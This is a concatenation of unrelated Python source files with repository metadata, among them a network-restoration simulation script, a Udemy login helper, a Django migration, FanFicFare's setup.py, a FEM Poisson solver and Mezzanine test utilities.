    # judge_types = ["OPTIMISTIC"]#"PESSIMISTIC",
    # run_indp_sample(layers)
    # run_tdindp_sample(layers)
    # # run_jc_sample(layers, judge_types, auction_type, valuation_type)
    # run_game_sample(layers, judge_types, auction_type, valuation_type, game_type="NORMALGAME")
    # run_game_sample(layers, judge_types, auction_type, valuation_type, game_type="BAYESGAME",
    #                 beliefs={1:'U', 2:'U'}, signals={1:'N', 2:'C'})
    # result_mh = run_mh_sample(layers) #!!!
    # COMBS = []
    # OPTIMAL_COMBS = [[0, 0, len(layers), len(layers), 'indp_sample_12Node', 'nan',
    #                   'nan', 'nan', ''],
    #                  [0, 0, len(layers), len(layers), 'tdindp_sample_12Node', 'nan',
    #                   'nan', 'nan', '']]
    # # for jt, rst, vt in itertools.product(judge_types, auction_type, valuation_type):
    # #     if rst == 'UNIFORM':
    # #         COMBS.append([0, 0, len(layers), len(layers), 'jc_sample_12Node', jt, rst, 'nan', 'real'])
    # #         COMBS.append([0, 0, len(layers), len(layers), 'ng_sample_12Node', jt, rst, 'nan', ''])
    # #     else:
    # #         COMBS.append([0, 0, len(layers), len(layers), 'jc_sample_12Node', jt, rst, vt, 'real'])
    # #         COMBS.append([0, 0, len(layers), len(layers), 'ng_sample_12Node', jt, rst, vt, ''])
    # BASE_DF, objs = dindputils.read_results(COMBS, OPTIMAL_COMBS, ['Total'],
    #                                         root_result_dir='../results/', deaggregate=True)
    # LAMBDA_DF = dindputils.relative_performance(BASE_DF, COMBS, OPTIMAL_COMBS,
    #                                             ref_method='indp_sample_12Node', cost_type='Total')
    # RES_ALLOC_DF, ALLOC_GAP_DF = dindputils.read_resourcec_allocation(BASE_DF, COMBS, OPTIMAL_COMBS,
    #                                                                   objs, root_result_dir='../results/',
    #                                                                   ref_method='indp_sample_12Node')
    # plots.plot_performance_curves(BASE_DF, cost_type='Total', ci=None,
    #                               deaggregate=True, plot_resilience=True)
    # plots.plot_relative_performance(LAMBDA_DF, lambda_type='U')
    # plots.plot_auction_allocation(RES_ALLOC_DF, ci=None)
    # plots.plot_relative_allocation(ALLOC_GAP_DF, distance_type='gap')
    ''' ^^^ '''

    ''' Set analysis directories '''
    #: The address to the list of scenarios that should be included in the analyses.
    FILTER_SCE = 'C:/Users/ht20/Box Sync/Shelby County Database/Damage_scenarios/damagedElements_sliceQuantile_0.95.csv'
    # 'C:/Users/ht20/Box Sync/Shelby County Database/damagedElements_sliceQuantile_0.90.csv'
    # '../data/damagedElements_sliceQuantile_0.90.csv'
    #: The address to the basic (topology, parameters, etc.) information of the network.
    BASE_DIR = "C:/Users/ht20/Documents/GitHub/NIST_testbeds/Joplin/Node_arc_info/"
    # "../data/Extended_Shelby_County/"
    # 'C:/Users/ht20/Box Sync/Shelby County Database/Node_arc_info/'
    # "C:\\Users\\ht20\\Documents\\Files\\Generated_Network_Dataset_v3.1\\"
    # "/home/hesam/Desktop/Files/Generated_Network_Dataset_v3.1"
    # "C:/Users/ht20/Documents/GitHub/NIST_testbeds/Joplin/Node_arc_info/"
    #: The address to damage scenario data.
    DAMAGE_DIR = "C:/Users/ht20/Documents/GitHub/NIST_testbeds/Joplin/Damage_scenarios/random_disruption/"
    # ../data/random_disruption_shelby/"
    # "../data/Wu_Damage_scenarios/"
    # "C:\\Users\\ht20\\Documents\\Files\\Generated_Network_Dataset_v3.1\\"
    # "/home/hesam/Desktop/Files/Generated_Network_Dataset_v3.1"
    # 'C:/Users/ht20/Box Sync/Shelby County Database/Damage_scenarios/'
    # "C:/Users/ht20/Documents/GitHub/NIST_testbeds/Joplin/Damage_scenarios/random_disruption/"
    #: The address to where output are stored.
    OUTPUT_DIR = '../results/'
    # '/home/hesam/Desktop/Files/Game_Shelby_County/results_0.9_perc'
    # 'C:/Users/ht20/Documents/Files/Auction_Extended_Shelby_County_Data/results/'
    # '../results/'
    # 'C:/Users/ht20/Documents/Files/Auction_synthetic_networks_v3.1/'
    # 'C:/Users/ht20/Documents/Files/Shelby_data_paper/results/'
    # FAIL_SCE_PARAM['TOPO']+'/results/'

    ''' Set analysis dictionaries '''
    #: Information on the type of the failure scenario (Andres or Wu)
    #: and network dataset (shelby or synthetic)
    #: Help:
    #: For Andres scenario: sample range: FAIL_SCE_PARAM['SAMPLE_RANGE'],
    #: magnitudes: FAIL_SCE_PARAM['MAGS']
    #: For Wu scenario: set range: FAIL_SCE_PARAM['SAMPLE_RANGE'],
    #: sce range: FAIL_SCE_PARAM['MAGS']
    #: For Synthetic nets: sample range: FAIL_SCE_PARAM['SAMPLE_RANGE'],
    #: configurations: FAIL_SCE_PARAM['MAGS']
    # FAIL_SCE_PARAM = {'TYPE':"WU", 'SAMPLE_RANGE':range(14), 'MAGS':range(2),
    #                   'FILTER_SCE':FILTER_SCE, 'BASE_DIR':BASE_DIR, 'DAMAGE_DIR':DAMAGE_DIR}
    # FAIL_SCE_PARAM = {'TYPE':"ANDRES", 'SAMPLE_RANGE':range(1, 1001), 'MAGS':[6, 7, 8, 9],
    #                   'BASE_DIR':BASE_DIR, 'DAMAGE_DIR':DAMAGE_DIR}
    FAIL_SCE_PARAM = {'TYPE':"random", 'SAMPLE_RANGE':range(0, 100), 'MAGS':range(0, 1),
                      'FILTER_SCE':None, 'BASE_DIR':BASE_DIR, 'DAMAGE_DIR':DAMAGE_DIR}
    # FAIL_SCE_PARAM = {'TYPE':"synthetic", 'SAMPLE_RANGE':range(0, 1), 'MAGS':range(68, 69),
    #                   'FILTER_SCE':None, 'TOPO':'Grid',
    #                   'BASE_DIR':BASE_DIR, 'DAMAGE_DIR':DAMAGE_DIR}
    # Dynamic parameters dict
    # DYNAMIC_PARAMS = None
    # DYNAMIC_PARAMS = {'TYPE': 'shelby_adopted', 'RETURN': 'step_function',
    #                   'DIR': 'C:/Users/ht20/Documents/Files/dynamic_demand/'}
    DYNAMIC_PARAMS = {'TYPE': 'incore', 'RETURN': 'step_function', 'TESTBED':'Joplin',
                      'DIR': "C:/Users/ht20/Documents/GitHub/NIST_testbeds/"}
    ### Dict contains information about the statistical models approximating INDP
    MODEL_DIR = 'C:/Users/ht20/Documents/Files/STAR_models/Shelby_final_all_Rc'
    STM_MODEL_DICT = None
    # {'num_pred':1, 'model_dir':MODEL_DIR+'/traces', 'param_folder':MODEL_DIR+'/parameters'}
    ### Directory with objects containing payoff values for games
    PAYOFF_DIR = '/home/hesam/Desktop/Files/Game_Shelby_County/results_NE_only_objs/'
    # Output and base dir for synthetic database
    SYNTH_DIR = None
    if FAIL_SCE_PARAM['TYPE'] == 'synthetic':
        SYNTH_DIR = BASE_DIR+FAIL_SCE_PARAM['TOPO']+'Networks/'
        OUTPUT_DIR += FAIL_SCE_PARAM['TOPO']+'/results/'

    ''' Set analysis parameters '''
    # No restriction on number of resources for each layer
    RC = [1]#[4, 8, 12]
    # Not necessary for synthetic nets
    # [3, 6, 8, 12]
    # [[1, 1, 1, 1], [2, 2, 2, 2], [3, 3, 3, 3]]# Prescribed for each layer
    LAYERS = [1,3]#[1, 2, 3, 4]
    # Not necessary for synthetic nets
    JUDGE_TYPE = ["PESSIMISTIC", "OPTIMISTIC", "DET-DEMAND"]
    #["PESSIMISTIC", "OPTIMISTIC", "DEMAND", "DET-DEMAND", "RANDOM"]
    RES_ALLOC_TYPE = ["MCA", 'UNIFORM', 'OPTIMAL']
    #["MDA", "MAA", "MCA", 'UNIFORM', 'OPTIMAL']
    VAL_TYPE = ['DTC']
    #['DTC', 'DTC_uniform', 'MDDN', 'STM', 'DTC-LP']

    ''' Run different methods '''
    # Fixed: these calls previously referenced the undefined name
    # DYNAMIC_PARAMS_DIR (only DYNAMIC_PARAMS is defined above), which
    # raised NameError as soon as the active call below executed.
    # run_method(FAIL_SCE_PARAM, RC, LAYERS, method='INDP', output_dir=OUTPUT_DIR,
    #            misc = {'DYNAMIC_PARAMS':DYNAMIC_PARAMS})
    # run_method(FAIL_SCE_PARAM, RC, LAYERS, method='TDINDP', output_dir=OUTPUT_DIR,
    #            misc = {'DYNAMIC_PARAMS':DYNAMIC_PARAMS})
    # # run_method(FAIL_SCE_PARAM, RC, LAYERS, method='JC', judgment_type=JUDGE_TYPE,
    # #            res_alloc_type=RES_ALLOC_TYPE, valuation_type=VAL_TYPE,
    # #            output_dir=OUTPUT_DIR,
    # #            misc = {'STM_MODEL':STM_MODEL_DICT, 'DYNAMIC_PARAMS':DYNAMIC_PARAMS})
    # run_method(FAIL_SCE_PARAM, RC, LAYERS, method='NORMALGAME', judgment_type=JUDGE_TYPE,
    #            res_alloc_type=RES_ALLOC_TYPE, valuation_type=VAL_TYPE, output_dir=OUTPUT_DIR,
    #            misc = {'PAYOFF_DIR':PAYOFF_DIR, 'DYNAMIC_PARAMS':DYNAMIC_PARAMS})
    run_method(FAIL_SCE_PARAM, RC, LAYERS, method='BAYESGAME', judgment_type=JUDGE_TYPE,
               res_alloc_type=RES_ALLOC_TYPE, valuation_type=VAL_TYPE, output_dir=OUTPUT_DIR,
               misc = {'PAYOFF_DIR':PAYOFF_DIR, 'DYNAMIC_PARAMS':DYNAMIC_PARAMS,
                       "SIGNALS":{x:'C' for x in LAYERS}, "BELIEFS":{x:'U' for x in LAYERS}})

    ''' Post-processing '''
    # COST_TYPES = ['Total'] # 'Under Supply', 'Over Supply'
    # REF_METHOD = 'indp'
    # METHOD_NAMES = ['indp', 'dp_indp'] #'ng', 'jc', 'dp_indp', 'tdindp' ''bgCCCCUUUU'
    # COMBS, OPTIMAL_COMBS = dindputils.generate_combinations(FAIL_SCE_PARAM['TYPE'],
    #             FAIL_SCE_PARAM['MAGS'], FAIL_SCE_PARAM['SAMPLE_RANGE'], LAYERS,
    #             RC, METHOD_NAMES, JUDGE_TYPE, RES_ALLOC_TYPE, VAL_TYPE,
    #             list_high_dam_add=FAIL_SCE_PARAM['FILTER_SCE'],
    #             synthetic_dir=SYNTH_DIR)
    # BASE_DF, objs = dindputils.read_results(COMBS, OPTIMAL_COMBS, COST_TYPES,
    #                                         root_result_dir=OUTPUT_DIR, deaggregate=False)
    # LAMBDA_DF = dindputils.relative_performance(BASE_DF, COMBS, OPTIMAL_COMBS,
    #                                             ref_method=REF_METHOD, cost_type=COST_TYPES[0])
    # RES_ALLOC_DF, ALLOC_GAP_DF = dindputils.read_resourcec_allocation(BASE_DF, COMBS, OPTIMAL_COMBS,
    #                                                                   objs, root_result_dir=OUTPUT_DIR,
    #                                                                   ref_method=REF_METHOD)
    # RUN_TIME_DF = dindputils.read_run_time(COMBS, OPTIMAL_COMBS, objs, root_result_dir=OUTPUT_DIR)
    # ANALYZE_NE_DF = gameutils.analyze_NE(objs, COMBS, OPTIMAL_COMBS)

    # ''' Save Variables to file '''
    # OBJ_LIST = [COMBS, OPTIMAL_COMBS, BASE_DF, METHOD_NAMES, LAMBDA_DF,
    #             RES_ALLOC_DF, ALLOC_GAP_DF, RUN_TIME_DF, COST_TYPES, ANALYZE_NE_DF]
    # ### Saving the objects ###
    # with open(OUTPUT_DIR+'postprocess_dicts.pkl', 'wb') as f:
    #     pickle.dump(OBJ_LIST, f)

    ''' Plot results '''
    plt.close('all')
    # ### Getting back the objects ###
    # with open(OUTPUT_DIR+'postprocess_dicts.pkl', 'rb') as f:
    #     [COMBS, OPTIMAL_COMBS, BASE_DF, METHOD_NAMES, LAMBDA_DF, RES_ALLOC_DF,
    #      ALLOC_GAP_DF, RUN_TIME_DF, COST_TYPE, ANALYZE_NE_DF] = pickle.load(f)
    # plots.plot_performance_curves(BASE_DF,
    #                               cost_type='Total', ci=95,
    #                               deaggregate=False, plot_resilience=True)
    # plots.plot_seperated_perform_curves(BASE_DF, x='t', y='cost', cost_type='Total',
    #                                     ci=95, normalize=False)
    # plots.plot_relative_performance(LAMBDA_DF, lambda_type='U')
    # plots.plot_auction_allocation(RES_ALLOC_DF, ci=95)
    # plots.plot_relative_allocation(ALLOC_GAP_DF, distance_type='gap')
    # plots.plot_run_time(RUN_TIME_DF, ci=95)
    # plots.plot_ne_analysis(ANALYZE_NE_DF, ci=None)
    # plots.plot_ne_cooperation(ANALYZE_NE_DF, ci=None)
    # [(RUN_TIME_DF['auction_type']!='MDA')&(RUN_TIME_DF['auction_type']!='MAA')]
    # [(BASE_DF['judgment_type']!='PESSIMISTIC')&\
    #  (BASE_DF['judgment_type']!='DET-DEMAND')&\
    #  (BASE_DF['decision_type']!='indp')&\
    #  (BASE_DF['auction_type']!='OPTIMAL')]
| 52.438819
| 120
| 0.613252
|
86ddd7e9d11df4962b845bf14f22f8c39d0e2beb
| 4,845
|
py
|
Python
|
udemy/auth.py
|
p-pavankumar/udemy-dl
|
1222b2d7fe3fc3e6c065e30061b4b4c34d4daa01
|
[
"MIT"
] | null | null | null |
udemy/auth.py
|
p-pavankumar/udemy-dl
|
1222b2d7fe3fc3e6c065e30061b4b4c34d4daa01
|
[
"MIT"
] | null | null | null |
udemy/auth.py
|
p-pavankumar/udemy-dl
|
1222b2d7fe3fc3e6c065e30061b4b4c34d4daa01
|
[
"MIT"
] | null | null | null |
# pylint: disable=R,C
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Author : Nasir Khan (r0ot h3x49)
Github : https://github.com/r0oth3x49
License : MIT
Copyright (c) 2018-2025 Nasir Khan (r0ot h3x49)
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the
Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR
ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH
THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from udemy.compat import conn_error, LOGIN_URL, cloudscraper
from udemy.logger import logger
from udemy.session import Session
from udemy.utils import (
search_regex,
hidden_inputs,
to_configs,
load_configs,
extract_cookie_string,
)
class UdemyAuth(object):
    """Udemy authentication helper.

    Logs in either by reusing cookies saved in the user's config file
    (``is_session_exists``) or by submitting the login form with the given
    credentials (``authenticate``). Requests to the login page go through
    cloudscraper to pass Cloudflare's anti-bot check.
    """
    def __init__(self, username="", password=""):
        # Credentials used for form-based login when no cookies are available.
        self.username = username
        self.password = password
        # API session that carries the auth headers/cookies for Udemy calls.
        self._session = Session()
        # Scraper used only for fetching/submitting the login form.
        self._cloudsc = cloudscraper.create_scraper()
    def _form_hidden_input(self, form_id):
        """Fetch the login page and return the hidden inputs of the form with
        id ``form_id`` (CSRF token etc.), with email/password merged in.

        Re-raises the underlying connection error if the page fetch fails.
        """
        try:
            resp = self._cloudsc.get(LOGIN_URL)  # pylint: disable=W
            resp.raise_for_status()
            webpage = resp.text
        except conn_error as error:
            raise error
        else:
            # Extract the form body by id, then collect its hidden <input>s.
            login_form = hidden_inputs(
                search_regex(
                    r'(?is)<form[^>]+?id=(["\'])%s\1[^>]*>(?P<form>.+?)</form>'
                    % form_id,
                    webpage,
                    "%s form" % form_id,
                    group="form",
                )
            )
            login_form.update({"email": self.username, "password": self.password})
            return login_form
    def is_session_exists(self):
        """Return ``(is_exists, conf)``.

        ``is_exists`` is True when the config file holds an ``access_token``
        cookie that still authenticates against the Udemy API; ``conf`` is the
        loaded config dict (possibly falsy when no config exists).
        """
        is_exists = False
        conf = load_configs()
        if conf:
            cookies = conf.get("cookies")
            if cookies:
                cookies = extract_cookie_string(cookies)
                access_token = cookies.get("access_token")
                client_id = cookies.get("client_id")
                self._session._set_auth_headers(  # pylint: disable=W
                    access_token=access_token, client_id=client_id
                )
                self._session._session.cookies.update(  # pylint: disable=W
                    {"access_token": access_token}
                )
                try:
                    # Probe an authenticated endpoint to validate the token.
                    url = "https://www.udemy.com/api-2.0/courses/"
                    resp = self._session._get(url)  # pylint: disable=W
                    resp.raise_for_status()
                    is_exists = True
                except Exception as error:  # pylint: disable=W
                    logger.error(
                        msg=f"Udemy Says: {error} session cookie seems to be expired..."
                    )
                    is_exists = False
        return is_exists, conf
    def authenticate(self, access_token="", client_id=""):
        """Authenticate against Udemy.

        When neither ``access_token`` nor ``client_id`` is supplied, performs
        a form login to obtain them. Returns ``(session, access_token)`` on
        success and ``(None, None)`` when no access token could be obtained.
        """
        if not access_token and not client_id:
            data = self._form_hidden_input(form_id="login-form")
            self._cloudsc.headers.update({"Referer": LOGIN_URL})
            # allow_redirects=False: the token is set on the login response
            # itself, before any redirect.
            auth_response = self._cloudsc.post(  # pylint: disable=W
                LOGIN_URL, data=data, allow_redirects=False
            )  # pylint: disable=W
            auth_cookies = auth_response.cookies
            access_token = auth_cookies.get("access_token", "")
            client_id = auth_cookies.get("client_id", "")
        if access_token:
            # dump cookies to configs
            # _ = to_configs(
            #     username=self.username,
            #     password=self.password,
            #     cookies=f"access_token={access_token}",
            # )
            self._session._set_auth_headers(  # pylint: disable=W
                access_token=access_token, client_id=client_id
            )
            self._session._session.cookies.update(  # pylint: disable=W
                {"access_token": access_token}
            )
            return self._session, access_token
        else:
            self._session._set_auth_headers()  # pylint: disable=W
            return None, None
| 40.041322
| 168
| 0.600413
|
05ff1963b3b0975f8c67a103807efcf55b9ac180
| 1,477
|
py
|
Python
|
app/migrations/0001_initial.py
|
marcmelchor/crawl-google-playsotre-reviews
|
a4db1acd6d552583592d0eb640c4dd17cc8eb4ef
|
[
"Apache-2.0"
] | null | null | null |
app/migrations/0001_initial.py
|
marcmelchor/crawl-google-playsotre-reviews
|
a4db1acd6d552583592d0eb640c4dd17cc8eb4ef
|
[
"Apache-2.0"
] | null | null | null |
app/migrations/0001_initial.py
|
marcmelchor/crawl-google-playsotre-reviews
|
a4db1acd6d552583592d0eb640c4dd17cc8eb4ef
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 3.1.7 on 2021-02-28 09:18
from django.db import migrations, models
import django.db.models.deletion
import django.db.models.manager
class Migration(migrations.Migration):
    """Initial schema: an ``App`` (Google Play app id) and its ``Review`` rows."""
    # First migration of this Django app; no dependencies.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='App',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Play Store package identifier; unique per tracked app.
                ('app_id', models.CharField(max_length=250, unique=True)),
            ],
            managers=[
                ('objects_manager', django.db.models.manager.Manager()),
            ],
        ),
        migrations.CreateModel(
            name='Review',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('review_id', models.CharField(max_length=250)),
                ('user_name', models.CharField(max_length=250)),
                ('user_image', models.CharField(max_length=250)),
                ('content', models.TextField()),
                ('score', models.IntegerField()),
                ('thumbs_up_count', models.IntegerField()),
                ('review_created_version', models.CharField(max_length=10)),
                ('at', models.DateField()),
                # FK to App; deleting an App cascades to its reviews.
                ('app_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='app.app')),
            ],
        ),
    ]
| 35.166667
| 114
| 0.562627
|
bf4335dd0ca4485aa6f8f951763c821b614800cb
| 4,496
|
py
|
Python
|
setup.py
|
TheCakeIsNaOH/FanFicFare
|
76565e959a38f9064fd8c7d09456053741598459
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
TheCakeIsNaOH/FanFicFare
|
76565e959a38f9064fd8c7d09456053741598459
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
TheCakeIsNaOH/FanFicFare
|
76565e959a38f9064fd8c7d09456053741598459
|
[
"Apache-2.0"
] | null | null | null |
"""A setuptools based setup module.
See:
https://packaging.python.org/guides/distributing-packages-using-setuptools/
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup
# To use a consistent encoding
import codecs
package_name="FanFicFare"
import sys
if sys.version_info < (2,7):
    sys.exit(package_name+' requires Python 2.7 or newer.')
# NOTE(review): this guard allows Python 2.7+, but the classifiers below only
# advertise Python 3.7 -- confirm which version floor is intended.
# Get the long description from the relevant file
with codecs.open('DESCRIPTION.rst', encoding='utf-8') as f:
    long_description = f.read()
setup(
    name=package_name,

    # Versions should comply with PEP440.
    version="4.6.0",

    description='A tool for downloading fanfiction to eBook formats',
    long_description=long_description,

    # The project's main homepage.
    url='https://github.com/JimmXinu/FanFicFare',

    # Author details
    author='Jim Miller',
    author_email='retiefjimm@gmail.com',

    # Choose your license
    license='Apache License',

    # See https://pypi.python.org/pypi?%3Aaction=list_classifiers
    classifiers=[
        # How mature is this project? Common values are
        # 3 - Alpha
        # 4 - Beta
        # 5 - Production/Stable
        'Development Status :: 5 - Production/Stable',

        'Environment :: Console',

        # Indicate who your project is intended for
        'Intended Audience :: End Users/Desktop',
        'Topic :: Internet :: WWW/HTTP',

        # Pick your license as you wish (should match "license" above)
        'License :: OSI Approved :: Apache Software License',

        # Specify the Python versions you support here. In particular, ensure
        # that you indicate whether you support Python 2, Python 3 or both.
        # Earlier py3 version may work, but I've not tested them.
        'Programming Language :: Python :: 3.7',
    ],

    # What does your project relate to?
    keywords='fanfiction download ebook epub html',

    # You can just specify the packages manually here if your project is
    # simple. Or you can use find_packages().
    # packages=find_packages(exclude=['contrib', 'docs', 'tests*']),
    packages=['fanficfare', 'fanficfare.adapters', 'fanficfare.writers',
              'fanficfare.browsercache','fanficfare.browsercache.chromagnon'],

    # for package_data
    package_dir={'fanficfare': 'fanficfare'},

    # List run-time dependencies here. These will be installed by pip when
    # your project is installed. For an analysis of "install_requires" vs pip's
    # requirements files see:
    # https://packaging.python.org/en/latest/requirements.html
    install_requires=['beautifulsoup4',
                      'chardet',
                      'html5lib',
                      'html2text',
                      'cloudscraper', # includes requests and deps.
                      'urllib3 >= 1.26.2', # for Retry(other=)
                      'requests >= 2.25.1', # otherwise version issues with urllib3
                      'requests-file',
                      'brotli',
                      'pywin32; platform_system=="Windows"'],
    # html5lib requires 'six', FFF includes it's own copy as fanficfare.six

    # List additional groups of dependencies here (e.g. development
    # dependencies). You can install these using the following syntax,
    # for example:
    # $ pip install -e .[dev,test]
    extras_require={
        'image_processing': ['Pillow'],
        # 'dev': ['check-manifest'],
        # 'test': ['coverage'],
    },

    # If there are data files included in your packages that need to be
    # installed, specify them here. If using Python 2.6 or less, then these
    # have to be included in MANIFEST.in as well.
    package_data={
        'fanficfare': ['defaults.ini', 'example.ini'],
    },

    # Although 'package_data' is the preferred approach, in some case you may
    # need to place data files outside of your packages. See:
    # http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
    # In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
    # data_files=[('my_data', ['data/data_file'])],

    # To provide executable scripts, use entry points in preference to the
    # "scripts" keyword. Entry points provide cross-platform support and allow
    # pip to create the appropriate form of executable for the target platform.
    entry_points={
        'console_scripts': [
            'fanficfare=fanficfare.cli:main',
        ],
    },
)
| 35.401575
| 94
| 0.645907
|
9232fa701615d9b5e6c929bbb6afc4790c913cd9
| 1,783
|
py
|
Python
|
codes/projects/poisson_linear_2d/utils_project/solve_fem_poisson_heat_linear_assembled.py
|
hwangoh/uq-vae
|
382548e6f6dd7f9d72feff0e0752beec871db348
|
[
"MIT"
] | 2
|
2021-07-28T16:47:18.000Z
|
2021-08-03T00:53:58.000Z
|
codes/projects/poisson_linear_2d/utils_project/solve_fem_poisson_heat_linear_assembled.py
|
HwanGoh/uq-vae
|
24a3d26987e2ec807d57601b14c68b22f3652a18
|
[
"MIT"
] | null | null | null |
codes/projects/poisson_linear_2d/utils_project/solve_fem_poisson_heat_linear_assembled.py
|
HwanGoh/uq-vae
|
24a3d26987e2ec807d57601b14c68b22f3652a18
|
[
"MIT"
] | 2
|
2021-09-29T08:31:46.000Z
|
2021-11-07T10:26:45.000Z
|
import tensorflow as tf
import numpy as np
import pandas as pd
import time
import pdb #Equivalent of keyboard in MATLAB, just add "pdb.set_trace()"
###############################################################################
# Neumann #
###############################################################################
class SolveFEMPoissonHeatLinearAssembled:
    """Linear Poisson/heat FEM solver using pre-assembled (dense) matrices.

    For a batch of parameter vectors p, computes state = (M p + b) A^T where
    M is the mass matrix, b the load vector, and A the pre-assembled forward
    operator. Optionally restricts the state to observation indices.
    Assumes the matrices are dense TF tensors — TODO confirm upstream.
    """
    def __init__(self, options, filepaths,
                 obs_indices,
                 forward_matrix, mass_matrix,
                 load_vector):
        #=== Defining Attributes ===#
        self.options = options
        self.filepaths = filepaths
        # Cast once so tf.gather in solve_pde gets integer indices.
        self.obs_indices = tf.cast(obs_indices, tf.int32)
        self.forward_matrix = forward_matrix
        self.mass_matrix = mass_matrix
        self.load_vector = load_vector

    def solve_pde(self, parameters):
        """Solve the PDE for a batch of parameters, shape (batch, dofs).

        Returns the full state (batch, dofs), or — when options.obs_type is
        'obs' — the state gathered at the observation indices and squeezed.
        """
        #=== Solving PDE (vectorized over the batch) ===#
        # rhs[n, :] = M @ parameters[n, :] + b for the whole batch at once.
        # The original looped over samples and tf.concat'ed one row at a
        # time, which is quadratic in the batch size; a single batched
        # matmul is equivalent (matmul with transpose_b=True == X @ M^T).
        rhs = tf.linalg.matmul(parameters, self.mass_matrix, transpose_b=True)\
                + tf.transpose(self.load_vector)
        state = tf.linalg.matmul(rhs, self.forward_matrix, transpose_b=True)
        #=== Generate Measurement Data ===#
        if self.options.obs_type == 'obs':
            state_obs = tf.gather(state, self.obs_indices, axis=1)
            return tf.squeeze(state_obs)
        else:
            return state
| 40.522727
| 93
| 0.530566
|
1b7f9e6bec4283e2d924ff9f29f58be4b4b4174f
| 332
|
py
|
Python
|
PBO_18102/tugas_5.1_18102.py
|
mjeiner28/PBO
|
e2885243a576d2ebb61fff66b9f1bf138be98d28
|
[
"MIT"
] | null | null | null |
PBO_18102/tugas_5.1_18102.py
|
mjeiner28/PBO
|
e2885243a576d2ebb61fff66b9f1bf138be98d28
|
[
"MIT"
] | null | null | null |
PBO_18102/tugas_5.1_18102.py
|
mjeiner28/PBO
|
e2885243a576d2ebb61fff66b9f1bf138be98d28
|
[
"MIT"
] | null | null | null |
# Ask the user for a food choice until it matches one of the menu items.
# Fixed: the original never compared the input against the menu, printed
# "selamat makan" unconditionally, and its trailing `break` was unreachable
# after `continue`, so the while loop never terminated.
status = False
batas = 3
tabel_menu = ["ayam goreng", "nasi kuning", "ikan bakar", "gohu"]
while batas > 2:
    tanya_username = input("masukan pilihan makanan: ")
    if tanya_username in tabel_menu:
        print("selamat makan")
        status = True
        break
| 23.714286
| 62
| 0.533133
|
09f69b3b96be010a0c7f47cd9b124b103121dab4
| 6,573
|
py
|
Python
|
mezzanine/utils/tests.py
|
UbuntuEvangelist/mezzanine
|
5d3c21f918f26dee7bc107122ca6a1ad247314b2
|
[
"BSD-2-Clause"
] | 1
|
2015-01-20T07:31:12.000Z
|
2015-01-20T07:31:12.000Z
|
mezzanine/utils/tests.py
|
alan-hicks/mezzanine
|
92fa94aa3053f4fda7bcef9b44b96fa1ebbf6860
|
[
"BSD-2-Clause"
] | 9
|
2020-03-24T16:20:31.000Z
|
2022-03-11T23:32:38.000Z
|
mezzanine/utils/tests.py
|
alan-hicks/mezzanine
|
92fa94aa3053f4fda7bcef9b44b96fa1ebbf6860
|
[
"BSD-2-Clause"
] | 19
|
2017-01-12T09:20:03.000Z
|
2019-06-18T14:53:32.000Z
|
from __future__ import unicode_literals
from future.builtins import open, range, str
from _ast import PyCF_ONLY_AST
import os
from shutil import copyfile, copytree
from django.contrib.auth import get_user_model
from django.db import connection
from django.template import Context, Template
from django.test import TestCase as BaseTestCase
from django.test.client import RequestFactory
from mezzanine.conf import settings
from mezzanine.utils.importing import path_for_import
# Ignore these warnings in pyflakes - if added to, please comment why.
# Each entry is matched as a substring of the checker's warning text.
IGNORE_ERRORS = (

    # Used to version subpackages.
    ".__version__' imported but unused",

    # No caching fallback.
    "redefinition of function 'nevercache'",

    # Dummy fallback in templates for django-compressor.
    "redefinition of function 'compress'",

    # Fabric config fallback.
    "redefinition of unused 'conf'",

    # Fixing these would make the code uglier IMO.
    "continuation line",
    "closing bracket does not match",

    # Jython compatibility.
    "redefinition of unused 'Image",

    # Django custom user compatibility.
    "'get_user_model' imported but unused",

    # lambdas are OK.
    "do not assign a lambda",

)
class TestCase(BaseTestCase):
    """
    This is the base test case providing common features for all tests
    across the different apps in Mezzanine.
    """

    def setUp(self):
        """
        Create an admin user, enable the debug cursor so that the number
        of queries used in various places can be tracked, and create a
        request factory for views testing.
        """
        self._username = "test"
        self._password = "test"
        self._emailaddress = "example@example.com"
        credentials = (self._username, self._emailaddress, self._password)
        self._user = get_user_model().objects.create_superuser(*credentials)
        self._request_factory = RequestFactory()
        # Remember the previous setting so tearDown can restore it.
        self._debug_cursor = connection.force_debug_cursor
        connection.force_debug_cursor = True

    def tearDown(self):
        """
        Clean up the admin user created and restore the debug cursor.
        """
        self._user.delete()
        connection.force_debug_cursor = self._debug_cursor

    def queries_used_for_template(self, template, **context):
        """
        Return the number of queries used when rendering a template
        string.
        """
        connection.queries_log.clear()
        Template(template).render(Context(context))
        return len(connection.queries)

    def create_recursive_objects(self, model, parent_field, **kwargs):
        """
        Create three levels of recursive objects, three objects per level.
        """
        for _ in range(3):
            kwargs[parent_field] = None
            first_level = model.objects.create(**kwargs)
            for _ in range(3):
                kwargs[parent_field] = first_level
                second_level = model.objects.create(**kwargs)
